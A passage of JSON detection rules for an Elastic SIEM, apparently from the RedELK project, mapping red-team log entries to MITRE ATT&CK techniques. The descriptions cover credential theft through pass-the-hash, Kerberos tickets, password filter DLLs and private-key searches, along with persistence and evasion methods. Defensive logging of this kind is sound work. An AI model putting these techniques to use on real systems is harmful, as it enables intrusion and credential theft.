addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1040","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1040] Network Sniffing","query":"threat.technique.id: T1040","references":["https://attack.mitre.org/techniques/T1040"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1040","name":"Network Sniffing","id":"T1040"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1040","name":"Network Sniffing","id":"T1040"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.[1] Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg.\nAdversaries may install a new service or modify an existing service by using system utilities to interact with services, by directly modifying the Registry, or by using custom tools to interact with the Windows API. Adversaries may configure services to execute at startup in order to persist on a system.\nAn adversary may also incorporate Masquerading by using a service name from a related operating system or benign software, or by modifying existing services to make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1050","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1050] New Service","query":"threat.technique.id: T1050","references":["https://attack.mitre.org/techniques/T1050","https://attack.mitre.org/techniques/T1543/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1050","name":"New Service","id":"T1050"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1050","name":"New Service","id":"T1050"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. [1] Adversaries may also used compressed or archived scripts, such as JavaScript.\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. [2] Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. [3]\nAdversaries may also obfuscate commands executed from payloads or directly via a Command and Scripting Interpreter. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. [4] [5][6]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1027","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1027] Obfuscated Files or Information","query":"threat.technique.id: T1027","references":["https://attack.mitre.org/techniques/T1027"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1027","name":"Obfuscated Files or Information","id":"T1027"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.[1] These persistence mechanisms can work within Outlook or be used through Office 365.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1137","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1137] Office Application Startup","query":"threat.technique.id: T1137","references":["https://attack.mitre.org/techniques/T1137"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1137","name":"Office Application Startup","id":"T1137"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.[1] This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.[2]\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.[3] This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.[4][3]\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.[5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1502","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1502] Parent PID Spoofing","query":"threat.technique.id: T1502","references":["https://attack.mitre.org/techniques/T1502","https://attack.mitre.org/techniques/T1134/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1502","name":"Parent PID Spoofing","id":"T1502"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1502","name":"Parent PID Spoofing","id":"T1502"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may \"pass the hash\" using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\nWindows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1075","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1075] Pass the Hash","query":"threat.technique.id: T1075","references":["https://attack.mitre.org/techniques/T1075","https://attack.mitre.org/techniques/T1550/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1075","name":"Pass the Hash","id":"T1075"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may \"pass the ticket\" using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\nIn this technique, valid Kerberos tickets for Valid Accounts are captured by OS Credential Dumping. A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.[1][2]\nSilver Ticket can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).[1]\nGolden Ticket can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.[3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1097","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1097] Pass the Ticket","query":"threat.technique.id: T1097","references":["https://attack.mitre.org/techniques/T1097","https://attack.mitre.org/techniques/T1550/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1097","name":"Pass the Ticket","id":"T1097"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1174","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1174] Password Filter DLL","query":"threat.technique.id: T1174","references":["https://attack.mitre.org/techniques/T1174","https://attack.mitre.org/techniques/T1556/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1174","name":"Password Filter DLL","id":"T1174"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Password Policy Discovery","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1201","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1201] Password Policy Discovery","query":"threat.technique.id: T1201","references":["https://attack.mitre.org/techniques/T1201"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1201","name":"Password Policy Discovery","id":"T1201"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Path Interception","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1034","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1034] Path Interception","query":"threat.technique.id: T1034","references":["https://attack.mitre.org/techniques/T1034","https://attack.mitre.org/techniques/T1574"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1034","name":"Path Interception","id":"T1034"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1034","name":"Path Interception","id":"T1034"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1120","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1120] Peripheral Device Discovery","query":"threat.technique.id: T1120","references":["https://attack.mitre.org/techniques/T1120"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1120","name":"Peripheral Device Discovery","id":"T1120"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1069","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1069] Permission Groups Discovery","query":"threat.technique.id: T1069","references":["https://attack.mitre.org/techniques/T1069"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1069","name":"Permission Groups Discovery","id":"T1069"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges).\nAdversaries can modify plist files to execute their code as part of establishing persistence. plists may also be used to elevate privileges since they may execute in the context of another user.[1]\nA specific plist used for execution at login is com.apple.loginitems.plist.[2] Applications under this plist run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them.[3] Users have direct control over login items installed using a shared file list which are also visible in System Preferences [3]. Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to \"hide\" the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in [4] [5]. The API method SMLoginItemSetEnabled can be used to set Login Items, but scripting languages like AppleScript can do this as well. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1150","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1150] Plist Modification","query":"threat.technique.id: T1150","references":["https://attack.mitre.org/techniques/T1150","https://attack.mitre.org/techniques/T1547/011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1150","name":"Plist Modification","id":"T1150"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1150","name":"Plist Modification","id":"T1150"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1150","name":"Plist Modification","id":"T1150"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. Port Knocking), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r [1], is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1205","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1205] Port Knocking","query":"threat.technique.id: T1205","references":["https://attack.mitre.org/techniques/T1205"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1205","name":"Port Knocking","id":"T1205"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1205","name":"Port Knocking","id":"T1205"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1205","name":"Port Knocking","id":"T1205"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. [1] This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. [2] Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors.\nThe Registry key contains entries for the following:\nLocal Port\nStandard TCP/IP Port\nUSB Monitor\nWSD Port\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1013","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1013] Port Monitors","query":"threat.technique.id: T1013","references":["https://attack.mitre.org/techniques/T1013","https://attack.mitre.org/techniques/T1547/010"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1013","name":"Port Monitors","id":"T1013"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1013","name":"Port Monitors","id":"T1013"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. [1] Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\nA number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.[2]\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). [3][4][5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1086","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1086] PowerShell","query":"threat.technique.id: T1086","references":["https://attack.mitre.org/techniques/T1086","https://attack.mitre.org/techniques/T1059/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1086","name":"PowerShell","id":"T1086"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments.\nPowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. [1]\nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the -NoProfile flag is used when it is launched. [2]\nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1504","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1504] PowerShell Profile","query":"threat.technique.id: T1504","references":["https://attack.mitre.org/techniques/T1504","https://attack.mitre.org/techniques/T1546/013"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1504","name":"PowerShell Profile","id":"T1504"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1504","name":"PowerShell Profile","id":"T1504"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.[1] Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.\nAdversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to Remote Services like SSH or for use in decrypting other collected files such as email.\nAdversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.[2][3]\nSome private keys require a password or passphrase for operation, so an adversary may also use Input Capture for keylogging or attempt to Brute Force the passphrase off-line.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1145","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1145] Private Keys","query":"threat.technique.id: T1145","references":["https://attack.mitre.org/techniques/T1145","https://attack.mitre.org/techniques/T1552/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1145","name":"Private Keys","id":"T1145"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nIn Windows environments, adversaries could obtain details on running processes using the Tasklist utility via cmd or Get-Process via PowerShell. Information about processes can also be extracted from the output of Native API calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1057","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1057] Process Discovery","query":"threat.technique.id: T1057","references":["https://attack.mitre.org/techniques/T1057"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1057","name":"Process Discovery","id":"T1057"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. [1] To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. [2] To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. [3]\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. [4]\nAdversaries may abuse TxF to a perform a file-less variation of Process Injection. Similar to Process Hollowing, process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. [4]\nProcess Doppelgänging is implemented in 4 steps [4]:\nTransact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\nLoad – Create a shared section of memory and load the malicious executable.\nRollback – Undo changes to original executable, effectively removing malicious code from the file system.\nAnimate – Create a process from the tainted section of memory and initiate execution.\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1186","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1186] Process Doppelgänging","query":"threat.technique.id: 